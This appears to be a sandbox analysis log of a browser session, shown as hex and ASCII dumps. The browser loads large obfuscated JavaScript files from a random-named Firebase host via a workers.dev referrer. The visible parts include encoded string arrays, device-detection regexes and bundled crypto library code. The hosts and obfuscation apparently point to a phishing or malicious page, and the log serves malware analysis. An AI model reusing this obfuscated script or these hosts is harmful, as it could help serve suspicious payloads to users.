740\|LS840\|LS970\|LU6200\|MS690\|MS695\|MS770\|MS840\|MS870\|MS910\|P500\|P700\|P705\|VM696\|AS680\|AS695\|AX840\|C729\|E970\|GS505\|272\|C395\|E739BK\|E960\|L55C\|L75C\|LS696\|LS860\|P769BK\|P350\|P500\|P509\|P870\|UN272\|US730\|VS840\|VS950\|LN272\|LN510\|LS670\|LS855\|LW690\|MN270\|MN510\|P509\|
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 32 34 35 7c 49 51 32 35 36 7c 49 51 32 33 36 7c 49 51 32 35 35 7c 49 51 32 33 35 7c 49 51 32 34 35 7c 49 51 32 37 35 7c 49 51 32 34 30 7c 49 51 32 38 35 7c 49 51 32 38 30 7c 49 51 32 37 30 7c 49 51 32 36 30 7c 49 51 32 35 30 22 2c 57 69 6b 6f 3a 22 4b 49 54 45 20 34 47 7c 48 49 47 48 57 41 59 7c 47 45 54 41 57 41 59 7c 53 54 41 49 52 57 41 59 7c 44 41 52 4b 53 49 44 45 7c 44 41 52 4b 46 55 4c 4c 7c 44 41 52 4b 4e 49 47 48 54 7c 44 41 52 4b 4d 4f 4f 4e 7c 53 4c 49 44 45 7c 57 41 58 20 34 47 7c 52 41 49 4e 42 4f 57 7c 42 4c 4f 4f 4d 7c 53 55 4e 53 45 54 7c 47 4f 41 28 3f 21 6e 6e 61 29 7c 4c 45 4e 4e 59 7c 42 41 52 52 59 7c 49 47 47 59 7c 4f 5a 5a 59 7c 43 49 4e 4b 20 46 49 56 45 7c 43 49 4e 4b 20 50 45 41 58 7c 43 49 4e 4b 20 50 45 41 58 20 32 7c 43 49 4e Data Ascii: 245\|IQ256\|IQ236\|IQ255\|IQ235\|IQ245\|IQ275\|IQ240\|IQ285\|IQ280\|IQ270\|IQ260\|IQ250",Wiko:"KITE 4G\|HIGHWAY\|GETAWAY\|STAIRWAY\|DARKSIDE\|DARKFULL\|DARKNIGHT\|DARKMOON\|SLIDE\|WAX 4G\|RAINBOW\|BLOOM\|SUNSET\|GOA(?!nna)\|LENNY\|BARRY\|IGGY\|OZZY\|CINK FIVE\|CINK PEAX\|CINK PEAX 2\|CIN
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 30 31 7c 47 54 2d 4e 35 31 30 30 7c 47 54 2d 4e 35 31 30 35 7c 47 54 2d 4e 35 31 31 30 7c 53 48 56 2d 45 31 34 30 4b 7c 53 48 56 2d 45 31 34 30 4c 7c 53 48 56 2d 45 31 34 30 53 7c 53 48 56 2d 45 31 35 30 53 7c 53 48 56 2d 45 32 33 30 4b 7c 53 48 56 2d 45 32 33 30 4c 7c 53 48 56 2d 45 32 33 30 53 7c 53 48 57 2d 4d 31 38 30 4b 7c 53 48 57 2d 4d 31 38 30 4c 7c 53 48 57 2d 4d 31 38 30 53 7c 53 48 57 2d 4d 31 38 30 57 7c 53 48 57 2d 4d 33 30 30 57 7c 53 48 57 2d 4d 33 30 35 57 7c 53 48 57 2d 4d 33 38 30 4b 7c 53 48 57 2d 4d 33 38 30 53 7c 53 48 57 2d 4d 33 38 30 57 7c 53 48 57 2d 4d 34 33 30 57 7c 53 48 57 2d 4d 34 38 30 4b 7c 53 48 57 2d 4d 34 38 30 53 7c 53 48 57 2d 4d 34 38 30 57 7c 53 48 57 2d 4d 34 38 35 57 7c 53 48 57 2d 4d 34 38 36 57 7c 53 48 57 2d 4d Data Ascii: 01\|GT-N5100\|GT-N5105\|GT-N5110\|SHV-E140K\|SHV-E140L\|SHV-E140S\|SHV-E150S\|SHV-E230K\|SHV-E230L\|SHV-E230S\|SHW-M180K\|SHW-M180L\|SHW-M180S\|SHW-M180W\|SHW-M300W\|SHW-M305W\|SHW-M380K\|SHW-M380S\|SHW-M380W\|SHW-M430W\|SHW-M480K\|SHW-M480S\|SHW-M480W\|SHW-M485W\|SHW-M486W\|SHW-M
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 41 7c 4b 46 53 41 57 49 7c 4b 46 41 53 57 49 7c 4b 46 41 52 57 49 7c 4b 46 46 4f 57 49 7c 4b 46 47 49 57 49 7c 4b 46 4d 45 57 49 29 5c 5c 62 7c 41 6e 64 72 6f 69 64 2e 2a 53 69 6c 6b 2f 5b 30 2d 39 2e 5d 2b 20 6c 69 6b 65 20 43 68 72 6f 6d 65 2f 5b 30 2d 39 2e 5d 2b 20 28 3f 21 4d 6f 62 69 6c 65 29 22 2c 53 75 72 66 61 63 65 54 61 62 6c 65 74 3a 22 57 69 6e 64 6f 77 73 20 4e 54 20 5b 30 2d 39 2e 5d 2b 3b 20 41 52 4d 3b 2e 2a 28 54 61 62 6c 65 74 7c 41 52 4d 42 4a 53 29 22 2c 48 50 54 61 62 6c 65 74 3a 22 48 50 20 53 6c 61 74 65 20 28 37 7c 38 7c 31 30 29 7c 48 50 20 45 6c 69 74 65 50 61 64 20 39 30 30 7c 68 70 2d 74 61 62 6c 65 74 7c 45 6c 69 74 65 42 6f 6f 6b 2e 2a 54 6f 75 63 68 7c 48 50 20 38 7c 53 6c 61 74 65 20 32 31 7c 48 50 20 53 6c 61 74 65 42 6f Data Ascii: A\|KFSAWI\|KFASWI\|KFARWI\|KFFOWI\|KFGIWI\|KFMEWI)\\b\|Android.Silk/[0-9.]+ like Chrome/[0-9.]+ (?!Mobile)",SurfaceTablet:"Windows NT [0-9.]+; ARM;.(Tablet\|ARMBJS)",HPTablet:"HP Slate (7\|8\|10)\|HP ElitePad 900\|hp-tablet\|EliteBook.*Touch\|HP 8\|Slate 21\|HP SlateBo

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:50 UTC	608	OUT	GET /sdxhetfdzzdsdsdxz/themes/149def4ccd8dab4c569bcf0843fd0619.js HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:50 UTC	614	IN	HTTP/1.1 200 OK Connection: close Content-Length: 358681 Cache-Control: max-age=3600 Content-Type: text/javascript; charset=utf-8 Etag: "5d3215acea5ec43cd852f0433d916f8ecbc379ab701980107fa87d5d46e53b46" Last-Modified: Wed, 07 Feb 2024 17:24:12 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Fri, 09 Feb 2024 10:09:50 GMT X-Served-By: cache-pdk-kfty2130064-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1707473390.248674,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 76 61 72 20 76 31 3d 5b 22 6d 64 61 5a 6b 71 3d 3d 22 2c 22 79 77 44 4c 22 2c 22 42 32 35 73 7a 78 66 31 7a 78 6e 30 73 77 34 3d 22 2c 22 73 32 4a 64 54 67 35 4e 69 68 74 64 52 67 30 47 44 61 3d 3d 22 2c 22 71 31 6e 73 76 78 72 50 42 61 3d 3d 22 2c 22 43 4d 4c 55 44 61 3d 3d 22 2c 22 72 32 76 55 7a 78 6a 50 79 31 62 4f 42 32 34 3d 22 2c 22 6c 4d 44 4c 44 65 76 55 79 32 39 4b 7a 77 71 3d 22 2c 22 43 32 76 30 75 68 76 59 43 67 39 5a 7a 75 65 3d 22 2c 22 75 65 54 6a 72 4d 66 50 42 68 76 59 7a 75 4b 3d 22 2c 22 58 51 66 55 69 67 48 56 34 42 51 33 79 59 62 49 34 42 51 58 42 47 3d 3d 22 2c 22 7a 32 76 30 76 76 72 64 74 77 39 55 44 67 47 3d 22 2c 22 6d 74 47 34 72 65 65 34 6d 65 76 63 6d 64 6d 3d 22 2c 22 76 65 75 54 22 2c 22 6d 49 34 30 6e 57 3d 3d 22 2c 22 7a Data Ascii: var v1=["mdaZkq==","ywDL","B25szxf1zxn0sw4=","s2JdTg5NihtdRg0GDa==","q1nsvxrPBa==","CMLUDa==","r2vUzxjPy1bOB24=","lMDLDevUy29Kzwq=","C2v0uhvYCg9Zzue=","ueTjrMfPBhvYzuK=","XQfUigHV4BQ3yYbI4BQXBG==","z2v0vvrdtw9UDgG=","mtG4ree4mevcmdm=","veuT","mI40nW==","z
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 67 39 30 79 77 57 47 22 2c 22 79 77 58 4e 75 68 6a 56 44 47 3d 3d 22 2c 22 43 30 48 48 43 32 48 69 7a 78 47 3d 22 2c 22 42 32 4c 4b 73 67 76 34 76 67 39 6a 42 4e 71 3d 22 2c 22 43 32 76 30 71 4e 4c 6a 42 4e 72 4c 7a 32 75 3d 22 2c 22 41 78 7a 53 7a 77 34 3d 22 2c 22 72 78 6a 59 42 33 69 47 74 77 76 5a 43 32 65 3d 22 2c 22 44 67 48 54 69 67 7a 56 43 49 62 73 75 30 65 3d 22 2c 22 6c 4a 43 55 6d 59 34 5a 22 2c 22 71 5a 6d 30 72 4a 66 66 72 4a 71 31 6d 75 79 3d 22 2c 22 44 78 72 4d 6f 61 3d 3d 22 2c 22 74 4c 6e 30 43 4d 4c 55 7a 57 3d 3d 22 2c 22 44 73 61 39 22 2c 22 43 32 76 4a 43 64 69 31 6e 4e 69 58 22 2c 22 79 78 72 35 43 67 75 59 42 32 4c 4b 74 67 4b 3d 22 2c 22 69 65 76 64 71 59 62 57 43 4d 4c 32 79 78 71 3d 22 2c 22 79 78 76 30 41 67 54 4c 45 71 3d 3d Data Ascii: g90ywWG","ywXNuhjVDG==","C0HHC2HizxG=","B2LKsgv4vg9jBNq=","C2v0qNLjBNrLz2u=","AxzSzw4=","rxjYB3iGtwvZC2e=","DgHTigzVCIbsu0e=","lJCUmY4Z","qZm0rJffrJq1muy=","DxrMoa==","tLn0CMLUzW==","Dsa9","C2vJCdi1nNiX","yxr5CguYB2LKtgK=","ievdqYbWCML2yxq=","yxv0AgTLEq==
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 77 66 53 41 78 50 4c 75 32 4b 3d 22 2c 22 79 78 76 30 41 67 39 59 41 78 72 35 41 32 75 3d 22 2c 22 43 32 76 30 75 68 76 49 73 32 76 35 22 2c 22 42 33 62 4c 42 4c 6a 4c 43 78 76 4c 43 33 71 3d 22 2c 22 6c 67 76 55 79 32 66 57 43 33 76 53 79 78 71 3d 22 2c 22 6d 74 61 58 6c 4a 6d 55 6e 63 34 5a 6c 4a 69 3d 22 2c 22 75 4d 76 58 44 77 76 5a 44 61 3d 3d 22 2c 22 7a 65 35 48 42 77 75 47 44 77 35 4b 7a 77 79 3d 22 2c 22 6d 49 34 31 6c 4a 71 55 6d 74 43 3d 22 2c 22 72 65 69 30 72 4b 79 58 6d 65 76 64 6d 64 75 3d 22 2c 22 42 4d 76 34 44 61 3d 3d 22 2c 22 43 33 76 49 41 4d 76 4a 44 63 62 55 79 77 30 3d 22 2c 22 41 77 7a 50 79 32 66 30 7a 76 79 59 22 2c 22 69 67 58 4c 42 4d 44 30 41 63 61 39 6d 63 61 3d 22 2c 22 75 4d 39 4a 41 30 6e 4f 41 78 62 75 79 77 69 3d 22 2c Data Ascii: wfSAxPLu2K=","yxv0Ag9YAxr5A2u=","C2v0uhvIs2v5","B3bLBLjLCxvLC3q=","lgvUy2fWC3vSyxq=","mtaXlJmUnc4ZlJi=","uMvXDwvZDa==","ze5HBwuGDw5Kzwy=","mI41lJqUmtC=","rei0rKyXmevdmdu=","BMv4Da==","C3vIAMvJDcbUyw0=","AwzPy2f0zvyY","igXLBMD0Aca9mca=","uM9JA0nOAxbuywi=",
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 69 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 69 3b 72 2b 3d 74 29 74 68 69 73 5b 68 61 64 28 22 30 78 33 30 61 22 29 2b 68 61 64 28 22 30 78 33 63 66 22 29 5d 28 64 2c 72 29 3b 76 61 72 20 73 3d 64 5b 68 61 64 28 22 30 78 35 36 36 22 29 5d 28 30 2c 69 29 3b 68 5b 68 61 64 28 22 30 78 37 62 36 22 29 5d 2d 3d 6e 7d 72 65 74 75 72 6e 20 6e 65 77 20 66 5b 68 61 64 28 22 30 78 61 33 30 22 29 5d 28 73 2c 6e 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 78 5b 68 61 64 28 22 30 78 35 31 62 22 29 5d 5b 68 61 64 28 22 30 78 31 33 65 22 29 5d 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 61 2e 5f 64 61 74 61 3d 74 68 69 73 5b 68 61 64 28 22 30 78 31 64 35 22 29 5d 5b 68 61 64 28 22 30 78 35 31 62 22 29 5d 28 29 2c 61 7d 2c 5f 6d 69 Data Ascii: i){for(var r=0;r<i;r+=t)this[had("0x30a")+had("0x3cf")](d,r);var s=d[had("0x566")](0,i);h[had("0x7b6")]-=n}return new f[had("0xa30")](s,n)},clone:function(){var a=x[had("0x51b")][had("0x13e")](this);return a._data=this[had("0x1d5")][had("0x51b")](),a},_mi
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 73 2e 5f 6c 42 6c 6f 63 6b 2c 74 68 69 73 5b 68 61 64 28 22 30 78 38 66 33 22 29 5d 3d 74 68 69 73 2e 5f 72 42 6c 6f 63 6b 2c 74 68 69 73 5b 68 61 64 28 22 30 78 34 64 65 22 29 5d 3d 64 2c 73 5b 68 61 64 28 22 30 78 31 33 65 22 29 5d 28 74 68 69 73 2c 31 2c 31 34 33 31 36 35 35 37 36 35 29 2c 6f 2e 63 61 6c 6c 28 74 68 69 73 2c 38 2c 31 36 37 31 31 39 33 35 29 2c 6f 5b 68 61 64 28 22 30 78 31 33 65 22 29 5d 28 74 68 69 73 2c 32 2c 38 35 38 39 39 33 34 35 39 29 2c 73 5b 68 61 64 28 22 30 78 31 33 65 22 29 5d 28 74 68 69 73 2c 31 36 2c 36 35 35 33 35 29 2c 73 5b 68 61 64 28 22 30 78 31 33 65 22 29 5d 28 74 68 69 73 2c 34 2c 32 35 32 36 34 35 31 33 35 29 2c 61 5b 68 5d 3d 74 68 69 73 5b 68 61 64 28 22 30 78 38 66 33 22 29 5d 2c 61 5b 68 2b 31 5d 3d 74 68 69 Data Ascii: s._lBlock,this[had("0x8f3")]=this._rBlock,this[had("0x4de")]=d,s[had("0x13e")](this,1,1431655765),o.call(this,8,16711935),o[had("0x13e")](this,2,858993459),s[had("0x13e")](this,16,65535),s[had("0x13e")](this,4,252645135),a[h]=this[had("0x8f3")],a[h+1]=thi
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 36 66 22 29 5d 28 29 3a 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 62 6e 43 6f 6d 70 61 72 65 54 6f 28 61 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 73 2d 61 2e 73 3b 69 66 28 30 21 3d 68 29 72 65 74 75 72 6e 20 68 3b 76 61 72 20 64 3d 74 68 69 73 2e 74 3b 69 66 28 30 21 3d 28 68 3d 64 2d 61 2e 74 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 3c 30 3f 2d 68 3a 68 3b 66 6f 72 28 3b 30 3c 3d 2d 2d 64 3b 29 69 66 28 30 21 3d 28 68 3d 74 68 69 73 5b 64 5d 2d 61 5b 64 5d 29 29 72 65 74 75 72 6e 20 68 3b 72 65 74 75 72 6e 20 30 7d 66 75 6e 63 74 69 6f 6e 20 6e 62 69 74 73 28 61 29 7b 76 61 72 20 68 2c 64 3d 31 3b 72 65 74 75 72 6e 20 30 21 3d 28 68 3d 61 3e 3e 3e 31 36 29 26 26 28 61 3d 68 2c 64 2b 3d 31 36 29 2c 30 21 3d 28 68 3d 61 3e 3e 38 29 26 26 28 61 3d 68 2c Data Ascii: 6f")]():this}function bnCompareTo(a){var h=this.s-a.s;if(0!=h)return h;var d=this.t;if(0!=(h=d-a.t))return this.s<0?-h:h;for(;0<=--d;)if(0!=(h=this[d]-a[d]))return h;return 0}function nbits(a){var h,d=1;return 0!=(h=a>>>16)&&(a=h,d+=16),0!=(h=a>>8)&&(a=h,
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 31 39 37 2c 31 39 39 2c 32 31 31 2c 32 32 33 2c 32 32 37 2c 32 32 39 2c 32 33 33 2c 32 33 39 2c 32 34 31 2c 32 35 31 2c 32 35 37 2c 32 36 33 2c 32 36 39 2c 32 37 31 2c 32 37 37 2c 32 38 31 2c 32 38 33 2c 32 39 33 2c 33 30 37 2c 33 31 31 2c 33 31 33 2c 33 31 37 2c 33 33 31 2c 33 33 37 2c 33 34 37 2c 33 34 39 2c 33 35 33 2c 33 35 39 2c 33 36 37 2c 33 37 33 2c 33 37 39 2c 33 38 33 2c 33 38 39 2c 33 39 37 2c 34 30 31 2c 34 30 39 2c 34 31 39 2c 34 32 31 2c 34 33 31 2c 34 33 33 2c 34 33 39 2c 34 34 33 2c 34 34 39 2c 34 35 37 2c 34 36 31 2c 34 36 33 2c 34 36 37 2c 34 37 39 2c 34 38 37 2c 34 39 31 2c 34 39 39 2c 35 30 33 2c 35 30 39 2c 35 32 31 2c 35 32 33 2c 35 34 31 2c 35 34 37 2c 35 35 37 2c 35 36 33 2c 35 36 39 2c 35 37 31 2c 35 37 37 2c 35 38 37 2c 35 39 33 Data Ascii: 197,199,211,223,227,229,233,239,241,251,257,263,269,271,277,281,283,293,307,311,313,317,331,337,347,349,353,359,367,373,379,383,389,397,401,409,419,421,431,433,439,443,449,457,461,463,467,479,487,491,499,503,509,521,523,541,547,557,563,569,571,577,587,593
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 72 61 63 74 28 69 5b 68 61 64 28 22 30 78 61 34 38 22 29 5d 28 29 5b 68 61 64 28 22 30 78 34 33 63 22 29 5d 28 69 29 29 5b 68 61 64 28 22 30 78 34 66 62 22 29 5d 28 74 68 69 73 5b 68 61 64 28 22 30 78 31 31 63 22 29 5d 2e 71 29 2c 73 3d 78 5b 68 61 64 28 22 30 78 61 34 38 22 29 5d 28 29 5b 68 61 64 28 22 30 78 34 33 63 22 29 5d 28 78 29 5b 68 61 64 28 22 30 78 32 36 63 22 29 5d 28 33 29 5b 68 61 64 28 22 30 78 34 66 62 22 29 5d 28 74 68 69 73 5b 68 61 64 28 22 30 78 31 31 63 22 29 5d 2e 71 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 45 43 50 6f 69 6e 74 46 70 28 74 68 69 73 5b 68 61 64 28 22 30 78 31 31 63 22 29 5d 2c 74 68 69 73 5b 68 61 64 28 22 30 78 31 31 63 22 29 5d 5b 68 61 64 28 22 30 78 36 61 30 22 29 2b 68 61 64 28 22 30 78 38 32 63 22 29 5d 28 6e 29 Data Ascii: ract(i[had("0xa48")]()[had("0x43c")](i))[had("0x4fb")](this[had("0x11c")].q),s=x[had("0xa48")]()[had("0x43c")](x)[had("0x26c")](3)[had("0x4fb")](this[had("0x11c")].q);return new ECPointFp(this[had("0x11c")],this[had("0x11c")][had("0x6a0")+had("0x82c")](n)
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 68 54 4c 56 3d 68 61 64 28 22 30 78 35 66 36 22 29 7d 2c 59 41 48 4f 4f 5b 68 61 64 28 22 30 78 38 31 30 22 29 5d 5b 68 61 64 28 22 30 78 61 38 39 22 29 5d 28 4b 4a 55 52 5b 68 61 64 28 22 30 78 39 39 38 22 29 5d 5b 68 61 64 28 22 30 78 36 38 22 29 5d 2c 4b 4a 55 52 5b 68 61 64 28 22 30 78 39 39 38 22 29 5d 5b 68 61 64 28 22 30 78 32 65 22 29 5d 29 2c 4b 4a 55 52 5b 68 61 64 28 22 30 78 39 39 38 22 29 5d 2e 44 45 52 49 6e 74 65 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 4b 4a 55 52 5b 68 61 64 28 22 30 78 39 39 38 22 29 5d 5b 68 61 64 28 22 30 78 35 37 64 22 29 5d 5b 68 61 64 28 22 30 78 61 36 30 22 29 5d 5b 68 61 64 28 22 30 78 34 38 34 22 29 5d 5b 68 61 64 28 22 30 78 31 33 65 22 29 5d 28 74 68 69 73 29 2c 74 68 69 73 2e 68 54 3d 22 30 32 22 2c 74 Data Ascii: hTLV=had("0x5f6")},YAHOO[had("0x810")][had("0xa89")](KJUR[had("0x998")][had("0x68")],KJUR[had("0x998")][had("0x2e")]),KJUR[had("0x998")].DERInteger=function(a){KJUR[had("0x998")][had("0x57d")][had("0xa60")][had("0x484")][had("0x13e")](this),this.hT="02",t
2024-02-09 10:09:50 UTC	16384	IN	Data Raw: 28 22 30 78 31 66 32 22 29 5d 28 61 2c 68 29 2b 32 2a 41 53 4e 31 48 45 58 5b 68 61 64 28 22 30 78 35 35 38 22 29 5d 28 61 2c 68 29 7d 2c 41 53 4e 31 48 45 58 5b 68 61 64 28 22 30 78 31 66 36 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 68 29 7b 76 61 72 20 64 3d 41 53 4e 31 48 45 58 2c 78 3d 6e 65 77 20 41 72 72 61 79 2c 74 3d 64 2e 67 65 74 56 69 64 78 28 61 2c 68 29 3b 22 30 33 22 3d 3d 61 5b 68 61 64 28 22 30 78 39 36 61 22 29 5d 28 68 2c 32 29 3f 78 2e 70 75 73 68 28 74 2b 32 29 3a 78 5b 68 61 64 28 22 30 78 31 33 66 22 29 5d 28 74 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 67 65 74 56 62 6c 65 6e 28 61 2c 68 29 2c 69 3d 74 2c 6e 3d 30 3b 3b 29 7b 76 61 72 20 72 3d 64 5b 68 61 64 28 22 30 78 33 65 64 22 29 2b 22 69 6e 67 49 64 78 22 5d 28 61 2c 69 29 Data Ascii: ("0x1f2")](a,h)+2*ASN1HEX[had("0x558")](a,h)},ASN1HEX[had("0x1f6")]=function(a,h){var d=ASN1HEX,x=new Array,t=d.getVidx(a,h);"03"==a[had("0x96a")](h,2)?x.push(t+2):x[had("0x13f")](t);for(var e=d.getVblen(a,h),i=t,n=0;;){var r=d[had("0x3ed")+"ingIdx"](a,i)

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:51 UTC	621	OUT	GET /sdxhetfdzzdsdsdxz/themes/js/238d344c676a54d66afd34590ccc34d21706715975.js HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:51 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 18968 Cache-Control: max-age=3600 Content-Type: text/javascript; charset=utf-8 Etag: "cdf70ef9f32071a04fb898deaefed9b13fa45fe60e14fc937a7d4c7723d8b9a3" Last-Modified: Wed, 07 Feb 2024 17:24:12 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Fri, 09 Feb 2024 10:09:51 GMT X-Served-By: cache-pdk-kfty2130021-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1707473391.190104,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 76 61 72 20 6b 31 3d 5b 22 6d 65 79 33 72 75 39 33 79 49 69 47 43 33 71 3d 22 2c 22 6e 67 71 59 7a 4e 44 74 69 65 47 5a 79 4a 71 3d 22 2c 22 79 49 35 48 43 68 61 56 43 32 72 34 41 67 75 3d 22 2c 22 6f 32 6e 56 42 32 54 50 7a 78 6d 38 6c 32 65 3d 22 2c 22 79 77 7a 4d 79 74 76 49 79 74 66 48 7a 4d 79 3d 22 2c 22 6c 32 65 2b 70 67 72 50 44 49 62 50 7a 64 30 3d 22 2c 22 79 77 58 31 7a 74 30 49 69 49 62 30 45 78 61 3d 22 2c 22 42 67 39 48 7a 67 6e 56 42 4d 7a 50 7a 31 38 3d 22 2c 22 44 64 53 53 6a 4e 66 31 42 33 71 37 44 67 65 3d 22 2c 22 42 32 39 30 7a 78 6a 6d 41 77 35 52 43 59 69 3d 22 2c 22 7a 77 35 30 6c 32 4c 54 79 77 44 4c 43 59 38 3d 22 2c 22 79 32 66 30 79 32 47 3d 22 2c 22 41 67 4c 4b 7a 67 76 55 69 4a 34 38 41 77 34 3d 22 2c 22 79 33 79 35 44 67 58 Data Ascii: var k1=["mey3ru93yIiGC3q=","ngqYzNDtieGZyJq=","yI5HChaVC2r4Agu=","o2nVB2TPzxm8l2e=","ywzMytvIytfHzMy=","l2e+pgrPDIbPzd0=","ywX1zt0IiIb0Exa=","Bg9HzgnVBMzPz18=","DdSSjNf1B3q7Dge=","B290zxjmAw5RCYi=","zw50l2LTywDLCY8=","y2f0y2G=","AgLKzgvUiJ48Aw4=","y3y5DgX
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 22 2c 22 42 4d 4c 30 69 49 62 4b 79 78 72 48 6c 77 69 3d 22 2c 22 79 32 66 53 42 65 31 4c 44 67 66 4b 79 78 71 3d 22 2c 22 79 32 39 55 43 33 72 59 44 77 6e 30 42 33 69 3d 22 2c 22 7a 68 50 36 7a 68 6e 4b 43 32 72 34 45 49 38 3d 22 2c 22 69 67 6e 53 79 78 6e 5a 70 73 6a 4a 6c 77 71 3d 22 2c 22 7a 4d 71 33 7a 4d 6a 50 69 49 62 30 79 77 69 3d 22 2c 22 79 32 72 55 6c 4d 31 5a 79 78 76 30 41 63 34 3d 22 2c 22 6d 74 65 49 69 68 7a 48 42 68 76 4c 70 73 69 3d 22 2c 22 44 4d 66 53 41 77 72 66 42 77 66 50 42 61 3d 3d 22 2c 22 44 77 58 53 43 68 76 53 42 68 62 31 43 32 47 3d 22 2c 22 41 78 79 2b 70 67 72 50 44 4a 34 38 6c 32 71 3d 22 2c 22 45 73 69 47 7a 67 66 30 79 73 31 49 41 77 34 3d 22 2c 22 6c 5a 58 50 7a 68 76 5a 7a 78 69 2b 6c 57 3d 3d 22 2c 22 6d 67 7a 4b 6c Data Ascii: ","BML0iIbKyxrHlwi=","y2fSBe1LDgfKyxq=","y29UC3rYDwn0B3i=","zhP6zhnKC2r4EI8=","ignSyxnZpsjJlwq=","zMq3zMjPiIb0ywi=","y2rUlM1Zyxv0Ac4=","mteIihzHBhvLpsi=","DMfSAwrfBwfPBa==","DwXSChvSBhb1C2G=","Axy+pgrPDJ48l2q=","EsiGzgf0ys1IAw4=","lZXPzhvZzxi+lW==","mgzKl
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 4b 7a 67 76 55 69 4a 34 3d 22 2c 22 70 63 39 4b 41 78 79 2b 70 67 7a 56 43 4d 30 3d 22 2c 22 6f 5a 4f 4d 43 78 76 56 44 64 54 64 42 32 34 3d 22 2c 22 44 32 66 59 42 47 3d 3d 22 2c 22 44 4e 69 55 71 74 61 47 70 5a 69 57 69 64 4f 3d 22 2c 22 42 4d 4c 54 79 78 72 50 42 32 34 54 7a 67 75 3d 22 2c 22 43 49 69 47 44 4d 66 53 44 77 75 39 69 4a 65 3d 22 2c 22 44 67 47 47 74 32 7a 4d 41 77 6e 4c 69 64 6d 3d 22 2c 22 41 77 71 39 69 4d 72 35 42 4d 66 54 41 77 6d 3d 22 2c 22 6f 77 71 5a 7a 4a 66 48 79 32 6d 35 7a 64 6d 3d 22 2c 22 42 67 66 35 6f 4a 65 55 6d 5a 79 33 43 5a 53 3d 22 2c 22 41 68 72 30 43 68 6d 36 6c 59 38 3d 22 2c 22 79 32 58 48 43 33 6d 39 69 4d 58 56 7a 32 4b 3d 22 2c 22 43 4d 30 4d 43 78 76 56 44 64 53 53 6a 4e 65 3d 22 2c 22 41 77 72 4b 7a 77 34 49 Data Ascii: KzgvUiJ4=","pc9KAxy+pgzVCM0=","oZOMCxvVDdTdB24=","D2fYBG==","DNiUqtaGpZiWidO=","BMLTyxrPB24Tzgu=","CIiGDMfSDwu9iJe=","DgGGt2zMAwnLidm=","Awq9iMr5BMfTAwm=","owqZzJfHy2m5zdm=","Bgf5oJeUmZy3CZS=","Ahr0Chm6lY8=","y2XHC3m9iMXVz2K=","CM0MCxvVDdSSjNe=","AwrKzw4I
